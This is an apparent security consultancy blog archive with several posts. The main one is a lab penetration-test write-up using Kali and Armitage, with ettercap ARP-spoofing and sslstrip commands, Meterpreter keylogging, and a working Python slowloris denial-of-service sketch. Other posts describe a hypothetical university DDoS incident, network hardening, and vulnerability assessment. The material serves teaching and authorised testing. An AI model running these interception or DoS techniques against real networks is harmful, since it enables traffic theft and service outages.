Category Archives: Penetration testing

Too Silo’d to React, Now Respond.

Ever think about what would happen if you got hacked? Maybe you are wondering if the IPS or HIPS teams are really doing their jobs. In corporate America it is easy to overlook precautions and security because you are stretched too thin. Today's threats keep evolving as bad actors continue to find ways inside. They exploit social sites and technology, prey on the human need to be helpful, and work their way through with advanced IPS, IDS, and Anti-X evasion techniques. So what are you to do?

Looking at the problem from your cube, doing your work on your piece of the asset, your mind tends to think, "OK, this is what I have to do," and you move on to the next asset and the services on it. That is all you can touch. Your ethical hacking group may be too busy (or not busy enough) to assist, and they may or may not find all the holes in your security posture. How about a resident hacker dedicated to your client, or your span of control of clients, who checks security by reviewing the vulnerability reports produced with hacking tools? The key difference is not paying for a once-a-year penetration test but testing regularly: red team vs. blue team, with results reported to management. Even testing monthly to confirm that patches and firewall rules are in place would be a big improvement, and I think it is one of the best security practices a company can adopt. RedSeal is a software solution that provides visibility into an organization's security by analyzing device configurations and building out the network diagram. It can then import vulnerability reports and host information to give you the what-if scenario you have been thinking about in your cube. It will also give you a list of objectives to test, so you can confirm that the holes found are real and need to be fixed.

Security is not something you buy or do once in a while. It is a practice built on defined policies and procedures that are executed over and over again. If you think you are failing to practice the right procedures every day, or that your vigilance is intermittent, then you are a good candidate for "Building Security into Everyday Operations 101." Yes, a bit wordy, but think about it: it is not rocket science. The hurdles are time, the silo, and recognizing the concept.

In conclusion, the best security is a resident security expert who is allowed to do their job and given the tools and processes to do it. If you cannot get a resident hacker or spend the time doing this yourself, allow me to make some suggestions. Get a requisition opened with HR to fill this role, or hire a firm that understands vulnerability assessments and penetration testing. Allow them to test regularly and report results to you, and maybe you can stay out of the news. Security awareness and training also help prevent attacks, because users bring risk in from their computers. The biggest ways in are Adobe Flash and Reader, Java, and spear phishing.

If you have any questions or comments, or are looking for advice on services and where to go, feel free to contact me.

Penetration Testing with Linux – Featuring Kali and Armitage

Netwerk Guardian LLC brings you this article showing what can be done in penetration testing with Kali or Backtrack and Armitage. This is a technical subset of my thesis on effective penetration testing. So without further delay…

Penetration testing with Linux is one of the best ways to perform tests; it is a versatile tool. Linux comes in many flavors, like Backtrack5 RC3 or now Kali. Linux allows for customization of the operating system itself plus the tools that you use, so the level of sophistication is limitless. This article covers using Backtrack5 RC3 and Armitage as they were used during the pen test; it may not cover every feature of Armitage. However, to give you a better understanding of Armitage, Kali is used in some screenshots as well. Note that Armitage is no longer supported under Backtrack with the release of Kali in early 2013. We chose Kali in this article to show you something recent, but the other versions of Linux are still very good tools to use in the field.

Backtrack comes loaded with Metasploit and, as you know, to find and run an exploit you had to switch to its directory and run the commands specific to it. This is no longer the case with Kali: following the FHS (Filesystem Hierarchy Standard), Kali makes all commands accessible system-wide from the command line. Armitage provides a nice GUI for Metasploit. It also has a dashboard you can use to set up the hosts or the network you are going to target. You can import hosts from files produced by other network security assessment tools like Nessus, IP360, and Burp session XML; Armitage imports from text or XML files. You can use some of the automation Armitage presents, but it is wise to customize these scripts when delivering a penetration test; you never really know what the outcome may be unless you test in a lab first. The great thing about Armitage is its database of known vulnerabilities and attacks that you can draw from during a test. This saves time and keeps you focused, though not all exploits work, since targets may be hardened. Customizing scripts and Linux itself has long been at the core of these releases. Armitage can be used as a standalone tool or as a networked solution when working with other pen testers. There are a few reporting options in Backtrack or Kali for saving your work and sharing results or progress. Armitage has its own place to store evidence, called loot, but it holds raw data rather than an all-inclusive report format.

Armitage is launched from the Applications menu by following Kali Linux > Exploitation Tools > Network Exploitation > Armitage (Image 1). In a new installation of Kali, you will have to type the following commands manually so that Armitage can connect to its database:
service postgresql start
service metasploit start
Once these are entered, you can start Armitage successfully with the default user name msf and password test.
Image 1

Next there is a series of prompts that walk you through launching and customizing port usage. Once Armitage is open, we can begin using it to scan for hosts or network subnets. Just launch nmap (Image 2) from within Armitage and choose to add a host or scan a network with one of several scripted choices. The rules are the same for using nmap inside Armitage as on its own: there are aggressive scans and quieter scans, so choose wisely if you need to stay quiet. The two machines we want to target are a server hosting the core business application and a typical user workstation. See Image 3 below, from the pen test previously run with Armitage on Backtrack5 RC3.

Image 2 (Launching nmap within Armitage)
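For readers who want to see what a basic TCP connect scan (the noisiest of nmap's scan types) actually does, here is a minimal Python sketch. The function name and the port list are my own illustration, not part of Armitage or nmap, and nmap itself does far more (timing, service and OS fingerprinting, stealthier SYN scans):

```python
import socket

def tcp_connect_scan(host, ports, timeout=0.5):
    """Attempt a full TCP connect to each port; return the ones that accept."""
    open_ports = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
        finally:
            s.close()
    return open_ports

if __name__ == "__main__":
    # Probe a few of the Windows ports discussed later in this article.
    print(tcp_connect_scan("", [135, 139, 445, 808, 992]))
```

A full connect like this completes the three-way handshake, which is exactly why it shows up in logs; quieter scans abort the handshake early.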

The next step is the find-vulnerabilities scan. Armitage scans the hosts it has found and comes up with a proposed list of attacks. Not every attack is going to work; Armitage identifies a type of technology to exploit, and that, coupled with your experience and training, lets you judge whether it may or may not succeed. This is where the pen tester needs to be at the top of their game to find an exploit to launch a payload with. What is good about Armitage is that each exploit or payload you try opens a new tab, so you can see what works, what doesn't, and where to go next.
Now that we have our hosts found and targeted, with an attack list, we can proceed. Since the machines were Windows based, we quickly went to an exploit to see if there was a way to pwn the boxes. In Armitage you can assign to each host the account used to log in and run the payloads. We tried many exploits but found that only one really worked; it is addressed later. Below in Image 3 you can see that when a system username and password are known and Login > psexec is used, lightning appears all around the host.

Image 3 (Note the lightning around Hosts = pwned)

In the pen test shown here, the machines' administrator accounts were known; this was a white box test to see if we could sniff traffic from the core business application. The objective was to imitate an insider threat, and to demonstrate something beyond passing the hash for the Windows users on the network.
The following describes what we want to test. It is taken from a lab setup mimicking a typical company using an earth materials management system. The network is made up of Microsoft Windows machines, with Windows 7 for end users and Windows Server 2008 R2 on the server side. The objective is to look for vulnerabilities on the host machines and see if we can capture data traveling from the hosts across the network to the server, as in corporate espionage.
1. Test Core Business Application
a. Test core business application against
i. Clear text traffic capturing
ii. Man in the middle (MITM)
iii. Spoofing
iv. Armitage w/Meterpreter
v. DoS Slowloris

Port Scanning Results and Issues
Scanning Windows machines

The first test was a scan of services and ports on the Microsoft devices. The test discovered the default Windows system ports open for unsigned SMB, telnet, and high ports. This included port scanning with Nessus as well as the Microsoft Baseline Security Analyzer. The results from Nessus showed an unsigned SMB/Samba port (445) as well as the open clear text telnet channel (23). Nessus found only one medium and one low alert for the server. Port 135 was found open on the workstation and is used for remote procedure calls. Port 139 was open and is used by SMB for file sharing with devices other than Microsoft's. Port 808 is the Streetsmarts web based application running encrypted. Port 992 was found to be an SSL port with a certificate error. Additional ports were found open in the range 49152-49157; Microsoft changed the start of the dynamic port range to 49152 in January 2008, and some P2P (peer-to-peer) file sharing has been known to run over these ports.
A possible attack that was not conducted in this test would have been privilege escalation via an SMB vulnerability combined with brute forcing usernames and passwords. The attacker could also have social engineered the information from an unsuspecting user. There is a real probability that this could have happened.

Armitage has an option to ask it what vulnerabilities and attacks could be possible against the chosen target. Just select the host and then go to the menu Attacks > Find Attacks. It returns a list of possible attacks and says "Happy Hunting!" Therefore, that is exactly what happened.

The following tools were used to test for the vulnerability of unencrypted communication on the LAN (Local Area Network), with Ettercap always providing the MITM: SSLstrip, Dsniff, Driftnet, Urlsnarf, and Meterpreter.

Technical Overview – Sniffing MITM Attacks
Using Ettercap we copied traffic between the user and the gateway through our pen-testing laptop. We used Ettercap together with sslstrip, urlsnarf, dsniff, and Driftnet, entering the commands below, in an attempt to see traffic. In Ettercap we scanned the subnet and added target 1 = the gateway and target 2 = the victim machine. Here we were able to get a copy of everything the user sent, delivered to the laptop (attacker) first before going on to the real gateway. This is done with sslstrip, iptables, and Ettercap's ARP spoofing MITM attack. In a test where you are trying to conceal your activity from detection, it is very important to make sure your laptop can handle the traffic, and you must be ready to execute the sequence of commands in order, to avoid seeing packets destined to the same IP address twice.

Each attack and tool used has its benefits and limitations. The idea was to see whether data crossing the wire could be captured for corporate espionage and sold to a competitor. The tools were researched and chosen for this pen test to see what would really come across the wire. The following is a brief overview of each tool.

SSLstrip – A tool that prevents a connection from upgrading to an SSL session in an unnoticeable way. The history behind it is that one could forge a certificate as signed and trusted so that a session appeared to be HTTPS, or appeared legitimate to the intended server, while actually terminating at the attacker (Wikipedia).

Dsniff – A tool used to sniff anything of interest, like email or passwords. ARP spoofing has to be running, of course, so that the traffic is routed through the attacker's PC and back out to the real router and PC (Wikipedia).

Driftnet – This tool lets you see what images cross the user's browser while surfing the web. In this test users were not on the internet, but they were using a browser to launch an application we wanted to see.

Urlsnarf – A tool that writes all visited URLs to a file for easy review. Not a tool that provided much advantage in this pen test.

Meterpreter – This tool can be used to take advantage of many vulnerabilities on different platforms in order to gain root access to, or control of, a PC.

Script Execution
In the following code we see that numerous attempts utilizing Ettercap and ARP spoofing were made to send traffic to the attacker. Each tool was run alongside Ettercap to see what information would actually reach the attacker. The most exciting tools were Driftnet and Meterpreter, because of what could be seen and the control they provided.

ettercap --mitm arp:remote --text --quiet --write /root/sslstrip/ettercap.log --iface eth0
The GUI was also used to pick target 1, the client Windows 7 machine, and target 2, the application server.

In the CLI we executed the following commands:
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/# cat /proc/sys/net/ipv4/ip_forward
root@bt:~# sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Now verify the filter took:
root@bt:~# iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target     prot opt source     destination
REDIRECT   tcp  --  anywhere   anywhere     tcp dpt:www redir ports 10000

Chain INPUT (policy ACCEPT)
target     prot opt source     destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source     destination

Chain POSTROUTING (policy ACCEPT)
target     prot opt source     destination

root@bt:~# sudo python -l 10000 -f lock.ico

Results with sslstrip: No data or text of any sort was visible, since all data was being passed through an encrypted channel.

Results with dsniff: Web addresses were visible, but no usernames or passwords. These results suggest the application handles credentials securely.

Results with driftnet: There were no pictures or images of the site going across, though web addresses were listed.

Results with urlsnarf: The only things that came through were some local address space and some internet address space, redacted for publication. Still, there were no real gems of information for quick gains.

Technical Output
root@bt:~# urlsnarf -n -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
– – [15/Jan/2013:23:10:12 -0500] “GET HTTP/1.1” – – “-” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
– – [15/Jan/2013:23:10:13 -0500] “GET
– – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
– – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
– – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
– – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”
(Client addresses and URLs redacted for publication.)

Executed commands (example):
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/# cat /proc/sys/net/ipv4/ip_forward
1

In another terminal, we ran Driftnet:
root@bt:/# driftnet -i eth0
root@bt:/# driftnet -i eth0 -v -s (the -s switch in an attempt to capture streamed audio)
We could then see what images the user was looking at.

Results: Images from the core business application were not being sent to our laptop despite Driftnet running.
root@bt:~# driftnet -i eth0 -v
driftnet: using temporary file directory /tmp/driftnet-AmaowM
driftnet: listening on eth0 in promiscuous mode
driftnet: using filter expression `tcp’
driftnet: started display child, pid 2562
driftnet: link-level header length is 14 bytes
.driftnet: new connection: ->
…driftnet: new connection: ->
…driftnet: new connection: ->
…driftnet: new connection: ->

Meterpreter – To determine whether a connection made with Meterpreter through Armitage could glean any data or provide a way to leak data out, Meterpreter was used in this test. Knowing the administrator password, the connection was possible. Even a regular user with a known password would be able to pass the hash, dump hashes, and crack passwords later in order to attempt to escalate privileges. Time is the deciding factor in how successful the cracker would be by going slow at password cracking.

Results: We were able to log keystrokes and take screen shots of the user's computer. This is one way data could be captured. In this test we show that key logging and screen captures are possible; however, they are not very effective, as shown below in Image 7. Anything operating at the application layer of the OSI model remained visible and the tool worked; once traffic was encrypted at the network level, it was impossible to see.

Image 4 – Armitage Text Output of Key logging


Image 5 – Email Credentials Entered

Image 6 – Screenshot Before Launching Encrypted Application


Image 7 – After Launching Encrypted Application

We have seen before that the desktop can be captured with screen shots and information could be leaked that way. However, notice in the image below that the application icon is present as a big 'S' in the toolbar, and on the workstation the application is in the foreground. Yet the screenshot reveals nothing of it: the application's activity is encrypted to the reverse TCP shell. That 'S' represents the business's core application. The launch HTML page, served on port 80, is the only visible part of the application. This demonstrates that the application running on the computer was able to encrypt all activity for queries, results, and navigation.

DoS – Slowloris Python Script

Now we get to some fun. Besides trying to sniff traffic and look at client proprietary data, we can also try to make their systems unavailable as part of this test. Remember that an unavailable system means lost income, or a serious enough impact to make generating income and staying operational difficult. The script we will use is a Python script called slowloris; there is a version for IPv6 as well. This script is unique in that it does not try to hammer the web server right away with a full load of requests; instead it comes in waves. There are settings in the script for the number of connections per second and the frequency of those connections, and those two fields were used against the server. The server was Windows Server 2008 R2 (a fresh install with no updates).

Starting the script after you have downloaded it to your pen test PC takes a single command. As with any test, you start with what is supposed to work, then review the results and make changes. The changes we made were simple. Each time slowloris runs, it makes a whole bunch of half-open requests to the web server; the requests never get finished, and the web server just sits there with a session consumed, waiting for the client to resume communication. This weakness is known to affect some Apache servers but not IIS 7.0. At the time of this test that was unknown, and we thought it would be fun to try. Also check that you have Perl installed (perl -v), as most Linux instances do.
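The half-request behavior described above can be sketched in a few lines of Python. This is an illustration of the technique only, not the actual slowloris script; the host name, socket count, and interval are placeholders, and it should only ever be pointed at a lab machine you own:

```python
import socket
import time

def open_half_request(host, port=80, timeout=4):
    """Open a socket and send HTTP headers WITHOUT the final blank line,
    so the server keeps a worker waiting for the rest of the request."""
    s = socket.create_connection((host, port), timeout=timeout)
    s.sendall(b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n")
    return s

def keep_alive(sock):
    """Dribble out one more bogus header to reset the server's read timer."""
    sock.sendall(b"X-a: b\r\n")

def slowloris(host, num_sockets=200, interval=15):
    """Hold many half-open requests, refreshing them in waves."""
    socks = [open_half_request(host) for _ in range(num_sockets)]
    while True:
        for s in socks:
            keep_alive(s)        # never send the terminating \r\n\r\n
        time.sleep(interval)     # the wait interval seen as CPU dips on the target

# Lab use only, e.g.: slowloris("", num_sockets=1000, interval=30)
```

The waves come from the sleep interval: the server's CPU spikes while headers trickle in, then falls while the script waits, which matches the CPU behavior described in the next paragraph.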

We modified the script to change the number of connections, and then we lowered the timeout period before starting a new connection. As the script ran we would watch the CPU on the server spike to 78% and then 100%, then drop again as the script entered its wait interval. Then it would run again and we would see similar results on the CPU. As far as hacking goes, if you do not get the results you want, just keep trying. So we stopped the script and changed the connections per second to the maximum it would take, 10,000 per second, and tested again. After the second run, Server 2008 R2 would just take the hit but continue to serve the web page. Unfortunately for the pen tester there was no break in service; fortunately for the company running the software, they stayed operational. As a side note, for a non-Linux tool we also used the Low Orbit Ion Cannon on the server multiple times in addition to slowloris, and still the web site stayed up.

The following command will result in the same activity we tested earlier in 2013:
./ -dns -port 443 -timeout 30 -num 10000 -https

In conclusion, we see that Linux offers a wide variety of attack tools that can be run independently or as part of a package like Armitage, Kali, Ubuntu, and of course the Metasploit framework. This gives penetration testers the tools they need to test vulnerabilities by trying exploits with different payloads. Some Windows based tools have gained notoriety, but Linux is still the preferred platform. What is great about Linux and the open source community is the number of people contributing to its success, and that will carry the distributions forward as time and technology change.

Hypothetical DDoS (Part 2 of 2)

Recently a DDoS attack was carried out on the University's network, preventing legitimate users from enrolling in or managing classes. Forensic analysis with the Wireshark sniffer was able to determine what service and agents were causing the attack. The results showed a multitude of infected computers operating as a botnet to initiate the DDoS.

In order to safeguard against future attacks, Netwerk Guardian LLC has outlined and provided detailed application of security measures. These countermeasures will help secure devices and remove attack vectors, leaving only zero day and human related risks. The first step is to secure the devices that operate and manage the network: routers and switches that provide network access from inside to outside the University. Steps taken here will eliminate half-open TCP SYN connections, where a device sends SYN or SYN-ACK requests and then leaves the session open, never answering the ACK sent by the target; eventually the router or switch becomes overwhelmed and starts to fail or crash. Adjustments to avoid this can be made on routers and switches. Moving on to the routing vulnerabilities of out-of-the-box routers: turn off CDP globally and remove directed broadcasts. The source routing feature should also be turned off, as attackers can use strict or loose source routing to tell packets how to route. Proxy ARP and gratuitous ARP should be disabled. Proxy ARP is when a device answers a request on behalf of the sending device; gratuitous ARP is answering ARP requests not initiated by the router. Some vendors that schools use are 3Com, now HP, since their devices are plug and play; however, gratuitous ARP is turned on in those devices so the switch knows when it drops from a layer three device to a layer two device.
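As a sketch, on a Cisco IOS router the hardening steps above would look something like the following; the interface name is an example, and other vendors expose the same settings under different syntax:

```
! Disable CDP everywhere
no cdp run
! Do not forward source-routed packets (strict or loose)
no ip source-route
! Suppress gratuitous ARPs
no ip gratuitous-arps
! Per-interface hardening
interface GigabitEthernet0/0
 no ip directed-broadcast
 no ip proxy-arp
```

Each line maps directly to one of the vulnerabilities described: CDP leaks topology, source routing lets attackers steer packets, and directed broadcasts are the amplifier behind smurf attacks.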

The new generation of switches is more than just layer two; they are referred to as layer three switches, meaning they can switch and route like routers. Many of the same features need to be turned off and disabled as on routers, and gratuitous ARP is one of them. Another good practice is access control lists (ACLs) on interfaces and interface VLANs; these ACLs can stop traffic before it reaches a destination. Advanced configuration on the enterprise class of switches uses private VLANs and community VLANs as well as VLAN Access Control Lists (VACLs). With these configuration items, a network administrator could have blocked the DDoS attack by hiding the server in a private or community VLAN. Private VLANs can be broken down into primary and secondary VLANs. According to Wikipedia, the following is true: “Primary vlans usually communicate with only an upstream port for all their requests. This is good for the ISP internet drops to a house or if the university wanted to drop an uplink to a computer lab. All the routing and rules would take place upstream. Secondary vlans come in two types isolated and community. The hosts in isolated vlans are only allowed to communicate with primary vlan and not with each other and the devices in the community vlans are only allowed to communicate amongst themselves and the primary vlan and not any other vlan” (Wikipedia, 2012). Had the University applied this type of topology to their local area network (LAN), together with a virtual IP address appliance (VIP), they would have avoided this attack. Private VLANs along with a VIP would have provided protection from the flood of packets: the switches would only have allowed certain traffic from inside, multiplexed over to the server by the VIP. Multiplexed here means building the connection from an IP address based only on ports that match the protocol type and sequence.
This demonstrates secondary isolated VLAN communication going to an upstream device in the primary VLAN for requests, and then out to the LAN.
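As a sketch, a Catalyst-style private VLAN setup along those lines might look like this; the VLAN IDs and interface names are made-up examples, not taken from the incident:

```
vlan 101
 private-vlan isolated
vlan 100
 private-vlan primary
 private-vlan association 101
! Student lab port: isolated host, can only reach the promiscuous uplink
interface GigabitEthernet0/1
 switchport mode private-vlan host
 switchport private-vlan host-association 100 101
! Uplink toward the registration server / VIP appliance
interface GigabitEthernet0/24
 switchport mode private-vlan promiscuous
 switchport private-vlan mapping 100 101
```

Lab machines in the isolated VLAN cannot talk to each other at layer two, so a compromised lab PC could not have flooded its neighbors or reached the server except through the policed promiscuous port.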

The close look at device configurations in the preceding section covered a lot of detail about what comes out of the box and what must be configured to secure the device and the network. We are now going to step back and look at a defense in depth architecture. Defense in depth means more than patching our devices, using strong passwords, and controlling who or what interfaces with a device; it means a series of defense mechanisms. One is the firewall, which might be the router itself or come in line after it. These devices are good at stopping DoS and DDoS attacks; they are akin to a steel fireproof front door, doing the heavy work. Next, place two switches on the network to redistribute the uplink connection to the core, but only after traffic passes through an intrusion protection system (IPS). The IPS sits in line with traffic and passes it along to the network after reviewing what is coming in. Then the traffic can reach the core devices and the LAN can interact with the outside world. Taking security a step further, one can use an Intrusion Detection System (IDS), which scans traffic to determine whether it is safe but does not stop offending traffic. In most cases these devices are set up to pass traffic through while recording what types of attacks are being attempted. An IDS can sit in a DMZ in a honey pot network to attract and learn from attackers, or sit on a LAN. The next step is to bring all the data and detections together in an appliance like Cisco MARS, which processes the events and makes correlations into useful information for information security personnel. Then the security professional makes an informed decision on what should be done.

Security is not just a purchase; it is a plan, and it must be built into a network, not bolted onto it. Application layer firewalls and deep packet inspection firewalls allow a more granular approach to security. Packets are just packets, and if they are sequenced right they can get around security devices pretty easily. Network administrators have to start reviewing not only the sequence but the size of packets and, in some cases, what is in them; application layer gateways and proxy devices can do that. The University could have used a proxy server to broker requests from authenticated users before allowing access to the server, providing accountability plus assurance that the traffic is legitimate.

In conclusion, the best security is built into the network, with monitoring at all locations. The University needs to implement this topology so they receive intelligent information that allows them to act at a moment's notice. A DDoS will be much harder to accomplish against this infrastructure.

Hypothetical DDoS – (Part 1 of 2)

The Yourtown University campus had on-site computer labs for local attending students. The University offers many supporting services for students as they progress toward their degrees. During 2011 spring enrollment, the web based class registration system suffered a DDoS attack. The University network team found that the attack originated from the inside. The following explains how the attack occurred and the countermeasures required to prevent it in the future.

Early in spring 2011 enrollment for the new term, Yourtown University's online class registration system was unavailable during business hours and often into the evening. The IT department investigated during the first week and determined that the web server kept crashing; every few hours they had to restart it to recover the online registration service. An investigation began into whether the IIS server was failing from a bug or a patch. In the following week the web server crashed more and more, and the outages increased. The network administrators had been capturing traffic since the first occurrence and noticed a sniffer on the network in promiscuous mode listening to all traffic. They noticed not just one sniffer but multiple sniffers in different computer lab networks across campus. It was finally determined that someone had placed software based sniffers on different lab computers and was using an email relay service to send captures to a cryptically labeled email address.

During the next phase of the investigation, the network administrators tracked down the computers with the sniffers and removed them from service for analysis. The forensics team discovered a netcat installation on each box, in the default admin share, that allowed remote control of the computer; the attacker had gained access to the administrator username and password. The netcat listener acted as a terminal server, allowing more scripts for DNS poisoning and other programs to be dumped on the compromised machines. They also found a stripped down packet capture program that captured traffic and emailed text files in increments of 1.5 megabytes. Once the attacker could load files on the computers, he sent out bots that launched smurf attacks with the return answer directed at the class registration server. They also discovered remnants of the Low Orbit Ion Cannon, used for stress testing network devices.

Yourtown University called on the help of their superstar student Kevin Pescatello to assist in providing countermeasures to safeguard against this threat recurring. Kevin's experience with the Trustwave NAC device came to mind, and he suggested the purchase would return its investment in uptime and the reputation of the school. It would let students sign up, purchase, and pay for classes more consistently. This device performs network admission control and can be used on both hardwired and wireless networks, and it capitalizes on some unique processes that are under patent. The setup is to place the device on one of the core switches, managed through one port while monitoring all the VLANs on another; preferably two ports for monitoring, which also allows mirroring and sitting inline like an IPS (Intrusion Protection System). One key feature of the device is its ability to counter network traffic with a man in the middle attack of its own (Trustwave, 2012). When users join the network they have to sign in and get scanned for compliance: antivirus present and updates turned on. Once they meet those requirements, they can successfully log on. This allows policing of the internal networks and reduces internal threats. The network administrator can customize the logged-in profile to flag any machine with more than twenty connections, or scanning more than ten devices. When these thresholds are exceeded, the network admission control device steps in and moves the user to the "underverse," where there is no Ethernet or internet. The violating user remains isolated for a period before being allowed to authenticate and play nicely. Notably, there is a feature called deception: once it is turned on, an end user who scans addresses has his requests intercepted by Trustwave NAC and receives no response. The attacker's goal is thwarted.

Yourtown University has contracted with Netwerk Guardian LLC to install the device and train the network staff to use it. The cost will be budgeted in the next fiscal year. The return on investment, as stated earlier, is continued uptime for network resources, reputation, and lower administrative costs for IT and the bursar's office. The device will authenticate each student and make known who is connecting from where. Many of its more technical features describe the attack vectors it can thwart, among them DDoS, smurf attacks, IP spoofing, man-in-the-middle, port scanning, and sniffing. Most of these vectors, or a variant, were used in this incident.

Vulnerability Assessment – Should it be Done in House?

When it comes to a security assessment of your business's IT assets and infrastructure, who does it? You or the other guy?

Outsourcing Vulnerability Assessment


Difference between Vulnerability Assessment and a Pentest?
The difference is that a vulnerability assessment only finds the holes and does not exploit them. In a penetration test, security professionals think like hackers and try to use vulnerabilities to get inside the network. When conducting a vulnerability assessment, you want to scan the assets with the right software and try to find the vulnerabilities that attackers would find. A penetration test is where a vulnerability is actually exploited: a server is owned or a network is compromised, with data flowing out to the tester. In either scenario, the company must define its assets so it knows what will be tested, and assign ownership. While testing for weaknesses, you might as well prepare for an ISO 27001/2 audit.

A good example would be to take GFI LAN Scanner and scan a network with current definitions of known vulnerabilities loaded. The results should show which systems need to be patched. The same goes for Microsoft Baseline Security Analyzer, which reports the gap between a Windows system's current patch level and where it needs to be. A closer look at penetration testing: the tester plays the bad guy and enumerates the network from logged-in credentials, then uses a Meterpreter payload packaged in a game that an unsuspecting user downloads. Now the attacker can escalate to SYSTEM privileges and change the user account to an admin account on the box. This is the essence of a penetration test: the tester has inserted themselves, gained a foothold, and is escalating privileges to do more harm.
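The enumeration step just described can be sketched as a simple TCP connect scan with a best-effort banner grab. This is an illustrative sketch, not any vendor's scanner; the host and port list are placeholders, and it should only be run against systems you are authorized to test.

```python
import socket

def scan_host(host, ports, timeout=1.0):
    """TCP connect scan with a best-effort banner grab for each open port."""
    findings = {}
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout) as sock:
                sock.settimeout(timeout)
                try:
                    banner = sock.recv(128).decode(errors="replace").strip()
                except socket.timeout:
                    banner = ""  # open, but the service sent nothing
                findings[port] = banner or "open (no banner)"
        except OSError:
            continue  # closed or filtered port
    return findings

if __name__ == "__main__":
    # Placeholder target and ports; substitute hosts you are allowed to scan.
    for port, banner in scan_host("127.0.0.1", [22, 80, 443, 3389]).items():
        print(f"{port}/tcp: {banner}")
```

A dedicated scanner adds service fingerprinting and a vulnerability database on top of this; the connect-and-listen loop is the common core.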
Vulnerability Assessment
To conduct a vulnerability assessment correctly you have to define your assets and organize them. Know what you have and know what you want to test. This may mean assigning ownership of each asset as it is defined and analyzed. Next, get a few tools to help with the assessment: pick one that measures risk in software such as operating systems, and one that assesses networks. Before doing any work on the infrastructure, put in place a communication tree between the CIO and the outsourced vendor, so that if something does impact the production network, someone can stop it or inform staff that it is expected. Later, after the outsourced vulnerability assessment is conducted, the company's IT department may want policies and procedures outlining a scheduled assessment.
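The asset-definition step can be made concrete with a minimal inventory structure; the fields, sample entries, and owner names below are illustrative assumptions, not a prescribed schema.

```python
from dataclasses import dataclass, field

@dataclass
class Asset:
    name: str           # hostname or device label
    kind: str           # "server", "network", "application", ...
    owner: str          # person or team accountable for the asset
    software: list = field(default_factory=list)  # services in scope for the scan

# A minimal inventory: every asset gets an owner before any scan is planned.
inventory = [
    Asset("db01", "server", "dba-team", ["MS SQL 2019"]),
    Asset("edge-fw", "network", "netops", ["firewall firmware"]),
]

# A simple pre-assessment check: no asset enters scope without an owner.
unowned = [a.name for a in inventory if not a.owner]
assert not unowned, f"assets without owners: {unowned}"
```

Even a spreadsheet works here; the point is that scope and ownership are written down before any tool touches the network.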

The next thing you want to do is calculate the risk. Most often a quantitative assessment is done first, then a qualitative one. Here is one formula: Risk = Vulnerability × Attacks × Threat × Exposure (Snedaker, 2007). This will get you a dollar amount, but there is some subjective evaluation in the attack and exposure terms; this qualitative weighting inside a quantitative formula makes it a hybrid. Unless you are benchmarking from proven studies to extrapolate your numbers, it will have some subjective input. A more qualitative version leans on frequency estimates, which will be subjective in the first-year run; subsequent years can be defined more quantitatively, as a historical record will assist you.

When the company gets around to its own quarterly scanning and assessment, it should be written as a policy. The policy will state when, and by whom, the vulnerability assessment should be done. An accompanying procedure will outline the exact steps to take, proven and approved. This will move the company closer to ISO 27001/2 compliance as well as safeguard its assets.

Decision Point over Dilemma
The company faces a decision: proceed with its own assessment or hire a third party. Realistically, you should stick to what you are good at. If your IT department has a history of performing such analysis, proceed. However, this small company doesn't have the manpower, and knowledge of a practice is not the same as working knowledge. What matters to the company's IT department in the assessment: the scan types, the assets, demonstrated effective use of vulnerability assessment, and industry experience. Industry experience will cover much of what the IT department lacks in this disciplined practice; you need focus and experience to know what will work and what will not, and the department does not have the luxury of time to hone its skills. Another inherent risk is complacency with the environment. This doesn't mean the IT department is tired of the place it works; it means not all assets come to mind when some devices are not used all the time.

What are we looking for in the assessment? In a normal vulnerability assessment, the professional team looks for systems, servers, and networks that have not been patched to a protected level or hardened. Hardened systems run with only the services they really need and have some protection, whether a trusted computing base or a firewall. Systems patched to the right level with no known vulnerabilities are the goal of any assessment, along with preserving that secured level through continuous monitoring. The company's IT department may not have such knowledge and therefore may not be the best choice for running the assessment.

Company Action Items
The IT Security Professional is designated technical lead for the assessment. The action items are to find and catalog all assets, both hardware and software. The technical lead will group the network subnets together, if there is more than one, and likewise group the different operating system types. The next step is to identify the different software used as a service within the company: every server that shares out software and services must be identified and listed by version and type. For example, out of a list of all database servers, note which use MS SQL, which use Oracle, and which have a web front end in HTML; in addition, note which front ends are driven by SOAP, AJAX, or other technologies like Java. The list will be exhaustive, but it declares the assets and the exposure type each possesses, and it will be used by the outsourced company performing the scan.
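The grouping the technical lead performs can be sketched in a few lines; the host records, addresses, and assumed /24 subnet mask below are hypothetical.

```python
from collections import defaultdict
import ipaddress

# Hypothetical host records the technical lead might have collected.
hosts = [
    {"name": "db01",  "ip": "10.1.2.10", "os": "Windows Server 2019", "service": "MS SQL"},
    {"name": "db02",  "ip": "10.1.2.11", "os": "Linux",               "service": "Oracle"},
    {"name": "web01", "ip": "10.1.3.20", "os": "Linux",               "service": "AJAX front end"},
]

by_subnet = defaultdict(list)  # subnet -> host names
by_os = defaultdict(list)      # OS type -> host names
for h in hosts:
    # Assume /24 subnets for illustration; use real masks from the network docs.
    subnet = ipaddress.ip_network(f"{h['ip']}/24", strict=False)
    by_subnet[str(subnet)].append(h["name"])
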